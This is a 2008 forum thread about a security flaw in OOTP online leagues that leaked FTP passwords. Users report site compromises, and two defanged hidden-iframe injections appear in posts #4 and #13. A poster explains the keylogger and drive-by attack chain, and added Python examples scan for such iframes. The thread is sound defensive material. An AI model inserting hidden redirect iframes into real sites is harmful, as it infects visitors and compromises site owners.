12-04-2008, 07:11 AM | #1 |
Administrator
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
|
OOTP Online League Security Problem
Attention, online league commissioners! A security issue has been discovered in the online league dat files. The dat files contain the league server's FTP access information, and if a hacker finds the username and password he could easily access your web space and do all kinds of malicious things.

We will release a patched version very soon where the FTP information contained in the dat files is encrypted. It's currently in beta testing. However, you know that each encryption can be hacked, so we strongly suggest that you hide your league files! Only GMs should have access to the league files. There should be no (public) link to the league file anywhere on your web space. That's easy to do and it will keep away the evildoers. The perfect solution for the league file problem would be an extra subdomain on your web space where PHP/CGI/Perl/ASP is turned OFF and which has an extra FTP account that can only access that sub domain folder.

Please, all commissioners, do the following ASAP:

--- Change the FTP password of the web site which the GMs used for the online leagues NOW (i.e. the password which has been entered in OOTP). The password must be replaced with another one IMMEDIATELY! If you cannot do that or if you don't know how to do that, you have to ask the admin of the web server, i.e. your ISP (Internet Service Provider) who hosts your web space.
--- Move the league file to a different place on your web server where NOBODY CAN FIND IT. Only the GMs may know the address of the league file! Nobody else should be able to find it. You could just rename the league file or move it to another folder. In OOTP 2007/8/9 there is an option to set the name of the league file. Just set it to for example myLeague_ahsfkas89df.tar.gz and nobody will find it except your GMs who will get the link to the file from you.
--- Remove the link to the league file from your homepage! Many online leagues publish the link on their web page for convenience, but you should no longer do that!
--- Message board software and CMS (Content Management System like Joomla) software used for the online league web sites should be updated whenever updates are available. Hackers find new security holes in that kind of software frequently, simply because they have the source code of the software.

We apologise for any inconvenience!!

Please also have a look at these threads:
http://www.ootpdevelopments.com/boar...e-leagues.html
http://www.ootpdevelopments.com/boar...ty-notice.html
|
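The hiding steps from post #1, turned into a check a commissioner could run against a local mirror of the web space (an added example, not code from OOTP Developments or from the post). The folder layout, the sample file names and the helper names `hidden_name` and `audit` are assumptions made for illustration, and the league file is assumed to sit in its own upload folder.

```python
import re
import secrets
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

LINK = re.compile(r"""(?:href|src)\s*=\s*["']([^"']+)["']""", re.I)
PAGE_EXT = {".html", ".htm", ".php"}
SCRIPT_EXT = {".php", ".cgi", ".pl", ".asp"}  # types the post wants switched off there


def hidden_name(prefix="myLeague", nbytes=8):
    """League file name with a random suffix, like the post's myLeague_ahsfkas89df.tar.gz."""
    return f"{prefix}_{secrets.token_hex(nbytes)}.tar.gz"


def audit(webroot, league_rel):
    """Return sorted (problem, relative path) pairs for a local mirror of the web space."""
    root = Path(webroot)
    league, problems = root / league_rel, set()
    for page in root.rglob("*"):
        if not page.is_file() or page.suffix.lower() not in PAGE_EXT:
            continue
        for url in LINK.findall(page.read_text(encoding="utf-8", errors="replace")):
            if Path(urlsplit(url).path).name == league.name:
                problems.add(("public link to league file", page.relative_to(root).as_posix()))
    for item in league.parent.iterdir():
        if item.is_file() and item.suffix.lower() in SCRIPT_EXT:
            problems.add(("script in league upload folder", item.relative_to(root).as_posix()))
    return sorted(problems)


def demo():
    """Constructed web space: audit it as found, then again after renaming and cleanup."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "files").mkdir()
        (root / "files" / "myLeague.tar.gz").write_bytes(b"constructed placeholder")
        (root / "files" / "upload.php").write_text("<?php /* constructed */ ?>")
        (root / "index.html").write_text('<a href="/files/myLeague.tar.gz">League file</a>')
        before = audit(root, "files/myLeague.tar.gz")
        new_rel = "files/" + hidden_name()
        (root / "files" / "myLeague.tar.gz").rename(root / new_rel)
        (root / "files" / "upload.php").unlink()
        return before, audit(root, new_rel)
```

`demo()` returns the findings before and after the cleanup; the second list is empty because the stale homepage link no longer points at the renamed file.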
12-04-2008, 09:05 PM | #2 |
Minors (Double A)
Join Date: Nov 2002
Location: Northern Virginia
Posts: 164
|
Can we get a confirmation as to whether this affects OOTP 8, since a large % of leagues are still on this version?
__________________
Current Leagues: (All years in "game" years) NOBL - Boston Red Sox (2002-present) NOBL - Commish (2006 - present) TTWB - Farmingdale Frunkus (2011 - present) My OOTP graveyard: LLM - Yucatan Leones (2012 - folded) CPL - Detroit Tigers (2011 - folded) FHBL -Cincinnati Reds (2006 - folded) Maverick Baseball - Boston Red Sox (2005 - folded) BPLA - Portland (2004: folded) |
12-04-2008, 09:30 PM | #3 |
All Star Starter
Join Date: May 2006
Posts: 1,404
|
The answer is yes. It is in the referenced thread. They are working on patches for 2007 and 8.
__________________
Commish of the Home Nations Baseball Association Commish of the Baseball Association League Commish of the League of WAR Commish of the On-Line Dynasty League SIMBL2 - Westbury Cannons Great Lakes Baseball - Toledo Neptunes World Baseball - Guantanamo Marines OMLB - Cincinnati Reds |
12-05-2008, 12:57 AM | #4 |
Hall Of Famer
Join Date: Nov 2004
Posts: 6,069
|
I just found this in the index.html from an OOTP 6 online league I host...
Code:
<html>
<head>
<title>OOTP 6 Generated Website</title>
</head>
<frameset rows="100,*" frameborder="0" framespacing="0" border="0">
  <frame name="Banner" scrolling="no" noresize target="Inhalt" src="top.html">
  <frameset cols="100,*">
    <frame name="menu" target="Hauptframe" src="menu.html">
    <frame name="content" src="league.html">
  </frameset>
  <noframes>
  <body><(SPACE HERE) ****** src="http://badsitehere" style="width: 0px; height: 0px; display: none"><(SPACE HERE) /******>
  <p>Diese Seite verwendet Frames. Frames werden von Ihrem Browser aber nicht unterstützt.</p>
  </body>
  </noframes>
</frameset>
</html>
__________________
Fidel Montoya Asahi2 Baseball ex-Commissioner(Historical League Since 2004) www.allsimbaseball.com (OOTP web hosting - Customized sites for online leagues - Sign up, Connect OOTP and Play!) Share Your Mods - Free, unlimited and easy to upload to share your Mods instantly(free site registration required) Last edited by f.montoya; 12-17-2008 at 07:17 AM. |
12-05-2008, 03:47 AM | #5 | ||
Administrator
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
|
Quote:
Quote:
In OOTP 6.5 everything was encrypted, and obviously it has been hacked, too. We could improve the encryption, but it will also be hacked sooner or later.

See, obviously somebody wrote some code to hack OOTP Online leagues. He has to find and download the league file, extract the FTP info, log in to the site and do his dirty job. Lots of work actually, and there are not as many online leagues on the web as for example vBulletin message boards or Joomla web sites, so I don't know why the evildoer does that. There is only one explanation: we have an enemy out there. He cracked the first encryption and he will also crack the next one.

No, encryption is not the solution. We have to change the whole process, and until we have done that, the commissioners can do it on their own:
- hide the league files! Only your GMs may know where it is!
- use an extra FTP account for the folder to which the league files are uploaded!
- change your FTP password NOW!

We are sorry that this happened. We will improve OOTP and we will change the online league upload/download process. But the GMs can simply change the process now by hiding the league file and that will do much more than improving the encryption. |
||
12-05-2008, 04:04 AM | #6 |
Developer OOTP
Join Date: Dec 2001
Location: Germany
Posts: 24,738
|
Andreas is right. Please follow his guidelines!
|
12-05-2008, 04:59 AM | #7 |
Global Moderator
Join Date: Nov 2002
Location: Vancouver, Canada
Posts: 10,697
|
After the commish changes the league's ftp info everyone in the league will have to be sent a link to download and install the league files manually instead of being able to update through the game because their copy of the game won't be able to ftp yet, right?
|
12-05-2008, 05:19 AM | #8 |
Global Moderator
|
Correct, because the FTP details they have in their game will be wrong.
|
12-05-2008, 09:20 AM | #9 |
All Star Starter
Join Date: Jan 2007
Posts: 1,196
|
Am I right in assuming that version 9.2.7 should not be used and we should wait for 9.2.9? I am getting an error when I switch from an Online League to a Solo League. ( UTILITY_FUNCTIONS::get_decrypted_string-invalid source string ) I assume this has to do with identifying the difference between an Online League and a Non Online League. Last edited by SMFXR01; 12-05-2008 at 09:54 AM. |
12-06-2008, 02:20 PM | #10 | |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
Quote:
Second, while the ftp pw can certainly be obtained from the league file without much hassle, I doubt we are dealing with a cracker doing things manually here. Obviously, the ****** hack is appearing because the ftp pw is leaked, but it is a program that is inserting them (into all those files named "index" or "main") via a trojan on the user side. And no matter what you do if the trojan isn't removed from the machine, because that software (MPack, most likely) cycles and runs non-stop. The trojan is sending the cracker the ftp pw; if you change it but don't erase the trojan, he gets the new pw and you get the ****** code again.

He may have targeted OOTP leagues, but websites have been infected by the ****** in the thousands since 2007, from CBS to Auntie Mildred's cooking forums. Usually, it goes like this: this bot signs up on the forums (maybe several times); uses a valid email account and writes down a website address in its profile. Joe Curious notices the new guy on board and clicks to check that website. This one, of course, is a malware site, and the moment Joe Curious gets there his firewall and web browser are checked for security loopholes, and if he has them, the trojan is d/l'ed and installed automatically. The trojan is a keylogger that sends the cracker all sorts of pw, mainly ftp's. Thus, the moment you change the pw, he gets it. The ****** gets inserted in the code and redirects your page to the malware site, thus infecting those who have security loopholes (mostly everyone whose firewall does not block the redirection).

Things to do here are:
1. Scan your machine for malware. Keep in mind that the trojan may block the anti-malware, so you might want to online scan (trend micro, for example) and/or install the anti-malware (a-squared, malware bytes, etc.) on a pen drive and scan the pc from there and remove the trojan.
2. Once you have your machine cleaned, take a close look at all the files you have on your site, erasing those you don't recognize.
3. Change your main ftp pw.
4. Create an ftp user and pw with permission to access just the folder where OOTP exports are located. That's the one you have to type down within the game, not the main ftp id and pw.
5. Rename your "index" pages (at least, your frontpage) to a different name (yourleague.html, for example).
6. Authorize every new registration on your forums.
7. Get yourself a malware shield.
8. Make sure that your web browser is not allowed to d/l anything automatically.
9. Pray that the trojan is not located on the server side, because then your best move is transferring your site to another one.
__________________
The Computer Baseball League Last edited by Treches; 12-06-2008 at 02:27 PM. |
|
12-06-2008, 03:14 PM | #11 |
All Star Reserve
Join Date: Feb 2007
Posts: 925
|
You may be right about it being a trojan, but if that's the case we all have the same trojan. I know of at least 6 sites that were hacked multiple times in the last month or so, using the same method, including my own site which was hacked 4 times. Regardless of how the guy is getting the info, he's getting it and is apparently going after multiple OOTP sites.
|
12-06-2008, 04:05 PM | #12 |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
It's the same type of trojan and he/they is/are going after all kinds of sites because he/they is/are getting paid by the hit. The ****** not only gets inserted in the code but also erases other crackers' iframes. Mpack goes by $800, so we are not dealing with kids fooling around here.
__________________
The Computer Baseball League |
12-20-2008, 08:59 PM | #13 |
Hall Of Famer
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
|
Hey guys...
The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out. And today we were hacked. The Jamaica League was also hacked.

This was inserted in both our forums index.php file and our wordpress index.php file:
Code:
<****** src="evil site" style="width: 0px; height: 0px; display: none"></******>
__________________
NPBL - Pennsylvania Freedom AFBL - North Carolina Aviators MLB-Pro - Kansas City Royals Last edited by Chappy; 12-21-2008 at 01:44 PM. |
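A check for the injection shown in posts #4 and #13 and described in post #10, as an added example that is not part of any post in this thread: it walks a local copy of the web space and reports invisible frames in pages named "index" or "main". It assumes the tag the forum masked as ****** is an iframe (post #12 calls them iframes); the sample pages and the badsitehere.example address are constructed.

```python
import re
import tempfile
from html.parser import HTMLParser
from pathlib import Path

TARGET_STEMS = {"index", "main"}  # page names the thread says get rewritten
# Inline styles that make a frame invisible, as in the snippets posted above.
HIDDEN = re.compile(r"(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)|display\s*:\s*none", re.I)


class HiddenFrameFinder(HTMLParser):
    """Collect (line, src) for every iframe styled or sized to be invisible."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        zero_sized = "0" in (a.get("width"), a.get("height"))
        if tag == "iframe" and (HIDDEN.search(a.get("style", "")) or zero_sized):
            self.hits.append((self.getpos()[0], a.get("src", "")))


def scan_webroot(root, only_targets=True):
    """Return sorted (relative path, line, iframe src) findings under root."""
    findings = []
    for path in Path(root).rglob("*"):
        stem = path.name.split(".")[0].lower()
        if not path.is_file() or (only_targets and stem not in TARGET_STEMS):
            continue
        finder = HiddenFrameFinder()
        finder.feed(path.read_text(encoding="utf-8", errors="replace"))
        findings += [(path.relative_to(root).as_posix(), ln, src) for ln, src in finder.hits]
    return sorted(findings)


def demo():
    """Scan a constructed web root: two injected pages and one clean page."""
    bad = ('<iframe src="http://badsitehere.example/" '
           'style="width: 0px; height: 0px; display: none"></iframe>')
    pages = {"index.html": "<html><body>\n" + bad + "\n</body></html>",
             "main.html": '<iframe src="stats.html" width="600"></iframe>',
             "forum/index.php": "<?php include 'global.php'; ?>\n" + bad + "\n"}
    with tempfile.TemporaryDirectory() as root:
        for rel, text in pages.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(text, encoding="utf-8")
        return scan_webroot(root)
```

A hit is a prompt to compare the page with a known-good copy, since some sites use hidden frames legitimately; pass `only_targets=False` to cover every file under the web root.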
12-21-2008, 12:30 AM | #14 | |
Global Moderator
Join Date: Nov 2002
Location: Vancouver, Canada
Posts: 10,697
|
Quote:
Whatever it is, once you correct it, you'll probably want to change the passwords and locations again. |
|
12-21-2008, 07:26 AM | #15 | ||
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
Quote:
Quote:
__________________
The Computer Baseball League |
||
12-21-2008, 07:29 AM | #16 | |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
And read:
Quote:
__________________
The Computer Baseball League |
|
12-21-2008, 07:36 AM | #17 |
Hall Of Famer
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
|
So...
Would changing all the info and running a couple of sims from an alternate PC be a good idea?
__________________
NPBL - Pennsylvania Freedom AFBL - North Carolina Aviators MLB-Pro - Kansas City Royals |
12-21-2008, 07:40 AM | #18 |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
If you use an alternate PC you're safe if a) It's clean, and b) Has a fresh ftp password. In any case, I'd recommend you to focus on removing the keylogger trojan from whomever has it.
__________________
The Computer Baseball League |
12-21-2008, 07:42 AM | #19 |
Hall Of Famer
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
|
Also, remove the ****** link from your post.
__________________
The Computer Baseball League |
12-23-2008, 09:09 AM | #20 |
Hall Of Famer
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
|
Treches,
Thanks for the replies. I appreciate the help... However, I'm convinced that there is not a keylogger trojan on my machine. I've swept it now with 3 different products (including the Trend Micro one you recommended) and found nothing.
__________________
NPBL - Pennsylvania Freedom AFBL - North Carolina Aviators MLB-Pro - Kansas City Royals |